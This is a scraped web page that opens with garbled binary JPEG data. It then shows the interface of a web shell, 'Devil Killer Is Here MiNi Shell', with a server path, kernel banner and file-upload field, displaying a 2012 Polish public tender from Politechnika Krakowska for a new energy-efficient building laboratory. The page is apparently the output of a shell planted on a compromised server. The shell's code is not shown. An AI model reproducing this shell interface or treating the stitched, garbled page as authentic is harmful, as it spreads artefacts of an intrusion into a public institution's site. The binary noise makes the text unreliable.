JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121031/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121031/428776-N-2012.html

<p class="kh_header"><b>Kraków: Budowa Budynku Małopolskiego Laboratorium Budownictwa Energooszczędnego Politechniki Krakowskiej przy ul. Warszawskiej 24 w Krakowie</b><br>
<b>Numer ogłoszenia: 428776 - 2012; data zamieszczenia: 31.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Politechnika Krakowska im. Tadeusza Kościuszki Dział Zamówień Publicznych , ul. Warszawska 24, 31-155 Kraków, woj. małopolskie, tel. 12 628 26 56; 628 22 20, faks 12 6282072.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pk.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa Budynku Małopolskiego Laboratorium Budownictwa Energooszczędnego Politechniki Krakowskiej przy ul. Warszawskiej 24 w Krakowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest budowa Budynku Małopolskiego Laboratorium Budownictwa Energooszczędnego Politechniki Krakowskiej przy ul. Warszawskiej 24 w Krakowie (nazwa używana zamiennie Małopolskie Laboratorium Budownictwa Pasywnego)  w zakresie:

1.robót budowlanych 
-tablica informacyjna zgodna ze wzorem
-robót przygotowawczych i demontażowych z wywozem
-robót ziemnych 
wykonywanie wykopu pod projektowane fundamentu budynku,
wykonanie wykopu w związku z robotami izolacyjnymi,
umocnienie ścian wykopu,
pozyskiwanie gruntu z ukopu lub dokopu,
zasypanie wykopów,
wywóz nadmiaru ziemi,
zagęszczenie zasypek wykopów,
uwaga: Wykonawca zapewnieni geodezyjne wytyczenie obiektu, a przy pracach budowlanych fundamentowych nadzór archeologiczny.

-robót betonowych i żelbetowych 
wykonanie izolacji przeciwwilgociowej płyty fundamentowej,
wykonanie izolacji krawędziowej
wykonanie płyty fundamentowej gr. 0,5 oraz 0,6 m
wykonanie warstwy chudego betonu pod płytą fundamentową,
wykonanie stropów międzykondygnacyjnych żelbetowych płytowo-słupowych,
wykonanie żelbetowych belek krawędziowych,
wykonanie ścian usztywniających żelbetowych gr. 25 cm,
wykonanie żelbetowych schodów wewnętrznych,
wykonanie kotwienia warstwy klinkierowej do konstrukcji nośnej,
wykonanie stropodachu sprężonego dwukierunkowo cięgnami bez przyczepności,
wykonanie warstwy wyrównawczej podłogi na gruncie,
uwzględnienie umieszczenia w elementach żelbetowych czujników pomiarowych, zgodnie z dokumentacją

-robót murowych 
wykonanie wypełnienia pomiędzy słupami ścian zewnętrznych z pustaków,
wykonanie wypełnienia odcinkowego (IV piętro) pomiędzy słupami z cegły,
wykonanie ścian działowych,
wykonanie ściany akumulacyjnej z cegły pełnej.
uwzględnienie umieszczenia w elementach murowych czujników pomiarowych, zgodnie z dokumentacją

-tynki i okładziny wewnętrzne 
wykonanie tynków wewnętrznych cementowo wapiennych kat. III,
wykonanie okładzin z płytek klinkierowych,
wykonie okładzin z cegły klinkierowej ścian trójwarstwowych
uwzględnienie umieszczenia w elementach okładzin czujników pomiarowych, zgodnie z dokumentacją

-podłogi i posadzki z okładzin
ułożenie posadzek z wykładzin dywanowych w pomieszczeniach
wykonanie w pomieszczeniach okładzin ściennych z płytek ceramicznych,
wykonanie okładzin podłogowych z płytek ceramicznych,
wykonanie cokolików z płytek ceramicznych,

-instalowanie ścianek działowych i sufitów podwieszanych 
wykonanie ścianek działowych,
wykonanie obudowy szachów instalacyjnych z płyt g-k,
wykonanie sufitów podwieszonych w sanitariatach

-roboty w zakresie stolarki budowlanej.
Montaż stolarki okiennej aluminiowej,
Montaż drzwi zewnętrznych aluminiowych,
Montaż drzwi wewnętrznych płytowych,
Montaż drzwi wewnętrznych p.poż,
Montaż drzwi wewnętrznych aluminiowych,
Montaż słonecznych paneli grzewczych,
Montaż żaluzji,
Montaż ścianek działowych i drzwi systemowych w sanitariatach
uwaga: Ślusarka zewn. musi spełniać parametry techniczne zgodnie ze Szczegółową Specyfikacją Techniczną i rysunkami.
-roboty w zakresie ślusarki
Wykonanie balustrad wewnętrznych ścian elewacyjnych, 
Wykonanie balustrad klatki schodowej ze stali nierdzewnej, 
Wykonanie zadaszenia szklanego o konstrukcji cięgnowej nad wejściem,
Wykonanie zewnętrznych aluminiowych, systemowych ścian osłonowych,
Montaż  wycieraczek z krat stalowych,
Montaż zadaszenia nad wejściem,
Montaż ślusarki okiennej i drzwiowej.

-roboty w zakresie izolacji dźwiękoszczelnych
Wykonanie izolacji dźwiękoszczelnej międzykonygnacyjnych stropów.

-wykonanie izolacji termicznej. 
Wykonanie docieplenia posadzki na gruncie,
Wykonanie warstwy docieplenia ścian trójwarstwowych styropianem,
Wykonanie docieplenia ścian przyziemia, 
Wykonanie docieplenia stropodachu, 
Wykonanie docieplenia ścian działowych GKF,
Wykonanie izolacji ścian oddzielenia pożarowego wełną mineralną
uwzględnienie umieszczenia w elementach izolacji termicznej czujników pomiarowych, zgodnie z dokumentacją

-roboty w zakresie obróbek blacharskich.
Montaż obróbek blacharskich blachy tytanowo - cynkowej

Wykonanie pokryć dachowych
Wykonanie warstw stropodachu zielonego

Urządzeń i wyposażenia 
Dostawa i montaż windy osobowej 
Wyposażenia toalet
Dostawa mebli
Uwaga: Zakup i montaż dźwigu przystosowany dla użytkowników niepełnosprawnych wg. parametrów technicznych załączonych w dokumentacji projektowej -architektura 
Wykonawca musi posiadać uprawnienia Urzędu Dozoru Technicznego w zakresie montażu dźwigów 

2, robót sanitarnych wewnętrznych
wody zimnej, ciepłej, cyrkulacyjnej, hydrantowej ppoż
kolektorów  słonecznych 
 kanalizacji sanitarnej i deszczowej
gazu
 ciepła i chłodu na potrzeby ogrzewania i klimatyzowania budynku
wentylacji mechanicznej
kotłowni gazowej
3.robót sanitarnych zewnętrznych 
przyłącz gazu 
przyłącz MPEC
przyłącz wod-kan
węzeł cieplny
4.robót elektrycznych wewnętrznych w zakresie wewnętrznych instalacji elektrycznej i słaboprądowej w tym;

zestaw zasilająco - pomiarowy
rozdzielnia główna
tablice bezpiecznikowe
instalacja oświetlenia ogólnego
instalacja oświetlenia awaryjnego
instalacja oświetlenia ewakuacyjnego
instalacja oświetlenia technologicznego
instalacja gniazd wtykowych 1-fazowych
zasilanie urządzeń technologicznych
instalacje słaboprądowe
instalacja połączeń wyrównawczych
instalacja odgromowa
ochrona przed porażeniem
ochrona przeciw przepięciowa

5. robót elektrycznych zewnętrznych w zakresie instalacji elektrycznej zagospodarowania terenu w tym:
linia zasilająca kablowa NN
pomiar energii (wewnętrzny)
zestaw zasilający
oświetlenie zewnętrzne
ochrona przed porażeniem
ochrona przeciw przepięciowa

6. automatyka, wraz z BMS
zintegrowana instalacja kontroli dostępu i systemu sygnalizacji włamania i napadu 
system automatyki ,sterowania i akwizycji danych

7. specjalistyczny system badawczy opomiarowania przegród zewnętrznych i pomiarów gruntowych 

Czujniki pomiarowe z okablowaniem i systemem zbiorczym umieszczone w gruncie
Czujniki pomiarowe z okablowaniem i systemem zbiorczym umieszczone w elementach instalacyjnych
Czujniki pomiarowe z okablowaniem i systemem zbiorczym umieszczone w elementach budynku
Uwaga: Wykonawca zobowiązany jest do zakupu i montaż czujników do pomiarów specjalistycznych według wskazań zawartych w projekcie oraz potwierdzonych uzgodnień z zespołem MLBE. Wykonawca zobowiązany jest przeprowadzić montaż czujników do pomiarów specjalistycznych pod ścisłą kontrolą zespołu MLBE.  Wykonawca zobowiązany jest ustalić z zespołem MLBE zakres robót dotyczących wykonania ściany akumulacyjnej w pom. P01, doboru materiałów i elementów przed rozpoczęciem prac z wiązanych z budowa ściany akumulacyjnej.


Wymagane gwarancje :

Zamawiający wymaga, aby Wykonawca udzielił pełnej gwarancji na roboty budowlane objęte przedmiotem zamówienia na okres nie krótszy niż 5 lat licząc od daty odbioru końcowego, na zamontowane urządzenia na okres nie krótszy niż 5 lat , na zamontowane okna na okres nie krótszy niż 7 lat oraz na dźwig osobowy na 3 lata od momentu przekazania dźwigu do eksploatacji,
Zamawiający wymaga, aby Wykonawca w okresie gwarancji wykonał nieodpłatnie i własnym staraniem wszelkie przeglądy serwisowe wymagane przez producentów zainstalowanych urządzeń oraz elementów opomiarowania specjalistycznego jak również nieodpłatnie naprawy tych urządzeń  w razie wystąpienia usterek  lub uszkodzeń z powodu ich wadliwego wykonania lub wadliwego montażu.

Szczegółowy opis przedmiotu zamówienia zawierający projekt wykonawczy, specyfikacje techniczne wykonania i odbioru robót oraz przedmiary robót  zawiera  oraz wstępny harmonogram rzeczowy  zawiera załącznik zamieszczony   na stronie :
http://www.pk.edu.pl/index.php?option=com_content&task=view&id=73&Itemid=194

Warunki realizacji zamówienia zawiera również projekt umowy stanowiący Załącznik 7 do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.00.00-1, 45.45.00.00-6, 45.21.44.10-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.05.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 200 000.00 zł (słownie: dwieście tysięcy 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za posiadającego niezbędną wiedzę i doświadczenie uzna się Wykonawcę, który wykaże, że w ciągu ostatnich pięciu lat wykonał co najmniej:
1)	dla jednego obiektu budowlanego zamontował stolarkę aluminiową o wsp. przenikania ciepła dla całej konstrukcji Umlub równy 0,8 W/m2K w budynku nie mieszkalnym ( o zapotrzebowaniu na energię służącą do ogrzewania wnętrza 15 kWh/m2 w ciągu roku )
2)	dla jednego obiektu budowlanego elewację z ociepleniem o powierzchni co najmniej 500,00 m2 na budynku nie mieszkalnym  ( o zapotrzebowaniu na energię służącą do ogrzewania wnętrza 15 kWh/m2 w ciągu roku)
3)	dla jednego obiektu budowlanego wewnętrzną instalację elektryczną w budynku nie mieszkalnym ( o zapotrzebowaniu na energię służącą do ogrzewania wnętrza 15 kWh/m2 w ciągu roku )
4)	 dla jednego obiektu budowlanego wentylację mechaniczną  w budynku nie mieszkalnym ( o zapotrzebowaniu na energię służącą do ogrzewania wnętrza 15 kWh/m2 w ciągu roku )
5)	dla jednego obiektu budowlanego instalacje odzysku ciepła z gruntowego powietrznego wymiennika ciepła o wydajności 25.000 m3
6)	dla jednego obiektu budowlanego instalację automatyki BMS o wartości min. 800.000,00 zł 
Uwaga :
Powyższe prace Wykonawca mógł realizować w ramach jednej lub kilku odrębnych umów. 
Ocena spełniania warunku udziału w postępowaniu będzie dokonana na podstawie Wykazu zrealizowanych robót (załącznik nr 5 do SIWZ) 
i dołączonych do niego dokumentów, potwierdzających, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone 
(np. referencji, opinii, protokołów odbioru wystawionych przez zleceniodawcę)  na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>I.  Za dysponującego osobami zdolnymi do wykonania zamówienia uzna się  
    Wykonawcę który :
1)	dysponuje minimum 1 osobą posiadającą uprawnienia budowlane do prowadzenia robót budowlanych bez ograniczeń w specjalności konstrukcyjno-budowlanej oraz wpisaną do właściwej izby samorządu zawodowego
2)	dysponuje minimum 1 osobą posiadającą uprawnienia instalacyjne bez ograniczeń  w zakresie instalacji i urządzeń cieplnych, wentylacyjnych, wod -kan. oraz wpisaną do właściwej izby samorządu zawodowego
3)	dysponuje minimum 1 osobą posiadającą uprawnienia  budowlane bez ograniczeń w specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych, świadectwa kwalifikacyjne D i E w zakresie dozoru i eksploatacji instalacji i urządzeń elektroenergetycznych oraz wpisaną do właściwej izby samorządu zawodowego
4)	 dysponuje minimum 1 osobą kierującą robotami, posiadającą uprawnienia do kierowania robotami w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń,  a także posiadającą  minimum trzyletnia praktykę zawodowa i doświadczenie w kierowaniu zrealizowaną budową obiektu mieszczącego laboratoria badawcze, w zakresie odpowiadającym posiadanym uprawnieniom, 
5)	dysponuje minimum 1 osobą, kierującą robotami  posiadającą uprawnienia do kierowania robotami w zakresie telekomunikacji przewodowej wraz z infrastrukturą towarzyszącą bez ograniczeń, a także posiadającą minimum trzyletnia praktykę zawodowa i doświadczenie w kierowaniu zrealizowaną budową obiektu mieszczącego laboratoria badawcze , w zakresie odpowiadającym posiadanym uprawnieniom, 

6)	dysponuje minimum 1 osobą, specjalisty automatyka, który pełni funkcję integratora rozproszonych systemów sterowania, posiadającego minimum trzyletnią udokumentowaną praktykę zawodową i doświadczenie w instalacji, uruchamianiu i integracji  zintegrowanych systemów automatyki i bezpieczeństwa budynków  mieszczących laboratoria  badawcze oraz systemów BMS w budynkach nie mieszkalnych, udokumentowane  międzynarodowym certyfikatem potwierdzającym znajomość technologii bazowej zastosowanej do integracji systemu BMS np. w przypadku technologii bazowej LON zastosowanej w projekcie wykonawczym - certyfikatem LonMark Certified Professional , 
7)	 dysponuje minimum 1 osobą, specjalisty automatyka, osobą która pełni funkcję projektanta systemów BMS, posiadającego minimum trzyletnią praktykę zawodową i doświadczenie w realizacji systemów zbierania danych, wizualizacji i systemów zarządzania budynkami (BMS) obsługujących co najmniej 10000 (dziesięć tysięcy) zmiennych obiektowych, zrealizowanych na bazie systemu SCADA, , udokumentowane  uczestnictwem w realizacji systemu BMS w zrealizowanej budowie obiektu mieszczącego laboratoria badawcze 
8)	dysponuje specjalistą automatykiem, osobą, która pełni funkcje projektanta aplikacji LabVIEW lub aplikacji zbierania i przetwarzania danych pomiarowych w systemie równoważnym zaakceptowanym przez Inwestora, który posiada minimum trzyletnią praktykę zawodową i doświadczenie w realizacji systemów zbierania i przetwarzania danych w systemie bazowym wybranym dla systemu USAD, udokumentowane: certyfikatem Certified LabVIEW Developer, lub certyfikatem równoważnym dla wybranego, bazowego systemu dla systemu USAD, listą co najmniej 3 zrealizowanych aplikacji w systemie LabVIEW lub systemie równoważnym, zaakceptowanym przez Inwestora, obsługujących co najmniej 500 zmiennych,
Ocena spełniania warunku udziału w postępowaniu będzie dokonana na podstawie wykazu osób wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności, oraz informacją o podstawie do dysponowania tymi osobami (załączniku nr 6 i 6a do SIWZ) oraz  złożonych dokumentów i oświadczenia Wykonawcy, na zasadzie spełnia/nie spełnia.
II.  Wykonawca wykaże, że wielkości średniego rocznego zatrudnienia z         ostatnich 3 lat  wynosi co najmniej 100 osób 
Ocena spełniania warunku udziału w postępowaniu będzie dokonana na podstawie oświadczenia Wykonawcy, na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest wykazać, że znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, tj.:
1)	Osiągnął  w ostatnich 3 latach obrotowych, a jeżeli okres działalności jest krótszy, to w tym okresie przychody z działalności co najmniej 70 000 000 zł,
2)	wskaźnik płynności bieżącej, jako stosunek aktywów obrotowych do zobowiązań krótkoterminowych za ostatni rok obrotowy nie mniejszy   niż 1,35,
3)	Wykonawca musi być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na sumę ubezpieczenia nie mniejszą niż 10.000.000,00  zł,
4)	Wykonawca musi posiadać środki finansowe lub zdolność kredytową, w wysokości nie mniejszej  8.000.000 PLN,
Ocena spełniania warunków udziału w postępowaniu będzie dokonana na podstawie załączonych dokumentów  na zasadzie spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w całości, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego inny dokument określający obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 3 lata obrotowe</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony formularz oferty sporządzony wg załącznika nr 2 do SIWZ
Kosztorys ofertowy  wydruk uproszczony wraz z wykazem materiałów i szczegółowym wykazem sprzętu i urządzeń .
Kosztorys ofertowy należy złożyć wraz z jedną kopią spiętą oddzielnie  oraz w wersji elektronicznej na  płycie CD w wersji oryginalnych plików w programie kosztorysowym Rodos lub Zuzia lub w plikach możliwych do wczytania w przynajmniej z jednych z podanych programów ( np. format xml). Uwaga: kopia kosztorysu  powinna zostać opatrzona napisem KOPIA
Pisemne zobowiązanie podmiotu(ów) do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia - w przypadku gdy Wykonawca będzie polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów sporządzone wg wzoru stanowiącego załącznik nr 8 do SIWZ
Opcjonalnie, jeśli występuje pełnomocnik - pełnomocnictwo (w oryginale lub notarialnie potwierdzonej kopii) dla osoby reprezentującej w niniejszym postępowaniu Wykonawcę lub pełnomocnictwo dla osoby lub podmiotu reprezentującego kilku Wykonawców składających ofertę wspólną.
Dowód wniesienia wadium</p>
